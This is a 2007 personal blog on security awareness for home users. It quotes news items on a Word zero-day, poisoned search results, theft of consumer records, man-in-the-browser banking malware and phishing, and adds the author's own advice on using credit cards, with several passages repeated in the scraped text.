Last weekend I got to play a rousing game of "peek a boo" with my 2 year old, cute as a button niece. My kids are a little older now, so I forgot about how kids believe if cover their eyes, I’m not there.
Hmm, sounds familiar.
A few people I’ve spoken to lately don’t know much about internet attacks, or if they even have a firewall set up – but since they don’t see them, the hackers out there will somehow not get them. There is a little truth to the idea of 'security via obscurity' but ...
Boo!
I’ve read where over 75% of households surveyed thought they had “good” protection against viruses, spam etc. Of these only 30% were adequate. Most were using what came with the computer when it was purchased – and may or may not have been using the updates.
Here’s a flow of events to think about:
Day 0. A researcher publishes a newly discovered “hole” in a device (PC, iPhone, game console) for someone to take advantage of
Day 1. Anti-virus (AV) company begins work to plug this hole
Day 2. Badguys also begin work to take advantage of this hole
Day 3. AV company publishes fix
Day 3. Badguys release code to take advantage of it
In this scenario, if you’re using a reasonable protection scheme that’s updated automatically – you should be ok.
But what if the Badguys take advantage of a hole before the AV companies are ready for them? That’s called a Zero-Day attack.
Here’s one described:
The exploit arrives as an ordinary Microsoft Word document attachment to an e-mail. However, when the document is launched by the user the vulnerability is triggered to drop a backdoor with rootkit features to mask itself from anti-virus scanners.
The SANS ISC (Internet Storm Center) said in a diary entry that it received reports of the exploit from an unnamed organization that was targeted. "The e-mail was written to look like an internal e-mail, including signature. It was addressed by name to the intended victim and not detected by the anti-virus software," said Chris Carboni, an ISC incident handler tracking the attack.
When the .doc attachment is opened, it exploits a previously unknown vulnerability in Microsoft Word and infects a fully patched Windows system. The exploit functioned as a dropper, extracting and launching a Trojan that immediately overwrites the original Word document with a "clean," uninfected copy.
"As a result of the exploit, Word crashes, informs the user of a problem, and offers to attempt to re-open the file. If the user agrees, the new 'clean' file is opened without incident," the ISC explained.
read more
Friday, November 30, 2007
Wednesday, November 28, 2007
We're not in Kansas anymore
I use the internet a lot for work - probably 50% of my time everyday is spent online doing research. A lot of that research is via search engines, following links - looking things up. Perhaps I was being a little naive - but I thought as long as I didn't go to any websites that weren't safe for work, my computer would be ok.
Then I read this
Update: Subverted search sites lead to massive malware attack in progress
Trojans, rootkits, password stealers hit users who click on a bad link after a search
November 27, 2007 (Computerworld) -- A large-scale, coordinated campaign to steer users toward malware- spewing Web sites from Google and other Internet search engines is under way, security researchers said Tuesday.
Users searching Google, Yahoo, Microsoft Live Search and other engines with any of hundreds of legitimate phrases -- from the technical "how to cisco router vpn dial in" to the heart-tugging "how to teach a dog to play fetch" -- will see links near the top of the results listings that lead directly to malicious sites hosting a mountain of malware.
"This is huge," said Alex Eckelberry, Sunbelt Software's CEO. "So far we've found 27 different domains, each with up to 1,499 [malicious] pages. That's 40,000 possible pages."
Those pages have had their search site ranking boosted by crooked tactics that include "comment spam" and "blog spam," where bots inundate the comment areas of sites with links or mass large numbers of them as bogus blog posts. Attackers may be using bots to plug links into any Web form that requests a URL, added Sunbelt malware researcher Adam Thomas.
read more
Then I read this
Update: Subverted search sites lead to massive malware attack in progress
Trojans, rootkits, password stealers hit users who click on a bad link after a search
November 27, 2007 (Computerworld) -- A large-scale, coordinated campaign to steer users toward malware- spewing Web sites from Google and other Internet search engines is under way, security researchers said Tuesday.
Users searching Google, Yahoo, Microsoft Live Search and other engines with any of hundreds of legitimate phrases -- from the technical "how to cisco router vpn dial in" to the heart-tugging "how to teach a dog to play fetch" -- will see links near the top of the results listings that lead directly to malicious sites hosting a mountain of malware.
"This is huge," said Alex Eckelberry, Sunbelt Software's CEO. "So far we've found 27 different domains, each with up to 1,499 [malicious] pages. That's 40,000 possible pages."
Those pages have had their search site ranking boosted by crooked tactics that include "comment spam" and "blog spam," where bots inundate the comment areas of sites with links or mass large numbers of them as bogus blog posts. Attackers may be using bots to plug links into any Web form that requests a URL, added Sunbelt malware researcher Adam Thomas.
read more
IDs! Getchur hot IDs! IDs for sale!
it's that new black market again. IDs are stolen from one place, sold in the black market to others who plan organized attacks. yikes!
Database admin to plead guilty in theft of 8.5M consumer records
He agreed to pay restitution, cooperate with police and forfeit $105,000
November 27, 2007 (Computerworld) -- A senior database administrator at a subsidiary of Fidelity National Information Services Inc. (FIS) who was accused of stealing about 8.5 million customer records and selling them to data brokers is expected to plead guilty tomorrow to felony fraud charges in U.S. District Court in Tampa, according to court documents.
William G. Sullivan has also agreed to pay court-ordered restitution to victims, cooperate with ongoing investigations and forfeit the more than $105,000 he still has remaining from selling the stolen data. In exchange, according to a plea agreement also filed with the court, federal prosecutors are expected to recommend a reduction from the maximum five-year sentence that Sullivan could have gotten.
Sullivan worked as database administrator for Certegy Check Services Inc., a St. Petersburg, Fla.-based Fidelity subsidiary that provides a check-authorization service to financial institutions and merchants across the globe. FIS itself is a provider of transaction processing and related services to the financial industry. It is separate from the better-known Fidelity Investments.
read the full story
Database admin to plead guilty in theft of 8.5M consumer records
He agreed to pay restitution, cooperate with police and forfeit $105,000
November 27, 2007 (Computerworld) -- A senior database administrator at a subsidiary of Fidelity National Information Services Inc. (FIS) who was accused of stealing about 8.5 million customer records and selling them to data brokers is expected to plead guilty tomorrow to felony fraud charges in U.S. District Court in Tampa, according to court documents.
William G. Sullivan has also agreed to pay court-ordered restitution to victims, cooperate with ongoing investigations and forfeit the more than $105,000 he still has remaining from selling the stolen data. In exchange, according to a plea agreement also filed with the court, federal prosecutors are expected to recommend a reduction from the maximum five-year sentence that Sullivan could have gotten.
Sullivan worked as database administrator for Certegy Check Services Inc., a St. Petersburg, Fla.-based Fidelity subsidiary that provides a check-authorization service to financial institutions and merchants across the globe. FIS itself is a provider of transaction processing and related services to the financial industry. It is separate from the better-known Fidelity Investments.
read the full story
Tuesday, November 27, 2007
uh oh
In this story, they're referencing something similar to a 'man in the middle' attack. Picture you're playing a game of 'phone' as kid. You have a soup can, so does your friend. they're connected by a long piece of string and you talk to each other through the cans. This where a 'man in the middle' attack takes place - the fraudster would be in the middle of the string listening to your conversation.
'Man in the browser' is new threat to online banking
Traditional anti-malware software not likely to catch these threats quickly
November 27, 2007 (Computerworld UK) -- Criminals infecting PCs with malware that is only triggered when they access their bank accounts are the latest threat to online banking, according to security software supplier F-Secure.
Perpetrators act as a 'man in the browser' by intercepting HTML code in the Web browser. As bank security measures curb more traditional threats such as keystroke logging, phishing and pharming, F-Secure warned, the 'man in the browser' attack will increase.
Once a user's PC is infected, the malicious code is only triggered when the user visits an online bank. The 'man in the browser' attack then retrieves information, such as logins and passwords, entered on a legitimate bank site. This personal data is sent directly to an FTP site to be stored, where it is sold to the highest bidder.
read more
'Man in the browser' is new threat to online banking
Traditional anti-malware software not likely to catch these threats quickly
November 27, 2007 (Computerworld UK) -- Criminals infecting PCs with malware that is only triggered when they access their bank accounts are the latest threat to online banking, according to security software supplier F-Secure.
Perpetrators act as a 'man in the browser' by intercepting HTML code in the Web browser. As bank security measures curb more traditional threats such as keystroke logging, phishing and pharming, F-Secure warned, the 'man in the browser' attack will increase.
Once a user's PC is infected, the malicious code is only triggered when the user visits an online bank. The 'man in the browser' attack then retrieves information, such as logins and passwords, entered on a legitimate bank site. This personal data is sent directly to an FTP site to be stored, where it is sold to the highest bidder.
read more
Monday, November 26, 2007
Phishers Steal DOJ's Identity
New spam-based exploits also operate under guise of Better Business Bureau
NOVEMBER 20, 2007 You'd think that if you were going to commit a crime, impersonating a major law enforcement agency would be the last attack on your list. But some brassy phishers have got another idea.
According to a warning issued earlier today by Websense Security Labs, there is a new spam attack on the Web that claims to be a message from the U.S. Department of Justice.
read the full story
NOVEMBER 20, 2007 You'd think that if you were going to commit a crime, impersonating a major law enforcement agency would be the last attack on your list. But some brassy phishers have got another idea.
According to a warning issued earlier today by Websense Security Labs, there is a new spam attack on the Web that claims to be a message from the U.S. Department of Justice.
read the full story
Caution with credit cards
With the holidays upon us, it’s becoming a reflex move to pull that credit card out - unfortunately if you're concerned about identity theft this could be hazzardous.
Yesterday I was at a mall in the San Joaquin valley needing some food for my kids. The place was packed! As I walked into the court I realized I had a choice – I could either trust the person behind the counter was either honest or too busy/ worn out from the day to care who I was – or I should use cash from the nearby ATM machine. “What’s the difference Dave?” – by using cash I guaranteed my anonymity. If I were to hand the checkout person my card, I was giving up my name, and card number.
I wouldn’t normally give this much of a consideration but on the radio last week I heard a guy, ‘Bob’ on a radio show last week that wanted the DJs to call this girl ‘Sally’ for a date. After some prodding the DJs learned ‘Sally’ didn’t give Bob her phone number – he worked in a deli she frequented often. She paid with a credit card. By using her name and a search engine he found her personal information!
Be careful who you give your card to and be careful what you do with your personal statements.
Social engineering and dumpster diving are the number 1 ways people lose their private information.
Yesterday I was at a mall in the San Joaquin valley needing some food for my kids. The place was packed! As I walked into the court I realized I had a choice – I could either trust the person behind the counter was either honest or too busy/ worn out from the day to care who I was – or I should use cash from the nearby ATM machine. “What’s the difference Dave?” – by using cash I guaranteed my anonymity. If I were to hand the checkout person my card, I was giving up my name, and card number.
I wouldn’t normally give this much of a consideration but on the radio last week I heard a guy, ‘Bob’ on a radio show last week that wanted the DJs to call this girl ‘Sally’ for a date. After some prodding the DJs learned ‘Sally’ didn’t give Bob her phone number – he worked in a deli she frequented often. She paid with a credit card. By using her name and a search engine he found her personal information!
Be careful who you give your card to and be careful what you do with your personal statements.
Social engineering and dumpster diving are the number 1 ways people lose their private information.
Subscribe to:
Comments (Atom)
Posts
